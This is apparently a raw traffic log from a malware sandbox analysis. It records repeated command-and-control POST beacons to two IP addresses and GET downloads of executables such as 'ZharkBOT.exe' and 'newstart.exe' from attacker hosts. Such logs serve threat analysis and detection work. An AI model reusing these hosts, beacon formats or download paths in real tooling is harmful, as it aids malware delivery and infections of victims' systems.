                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 32 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000238001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: GET /lend/newstart.exe HTTP/1.1Host: 77.91.77.81
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000240001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000240001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: GET /large/see.exe HTTP/1.1Host: 77.232.41.110
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000241001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: GET /large/ZharkBOT.exe HTTP/1.1Host: 77.232.41.110
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000243001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 31 34 32 43 41 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CDF1A142CAFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 31 34 32 43 41 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CDF1A142CAFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
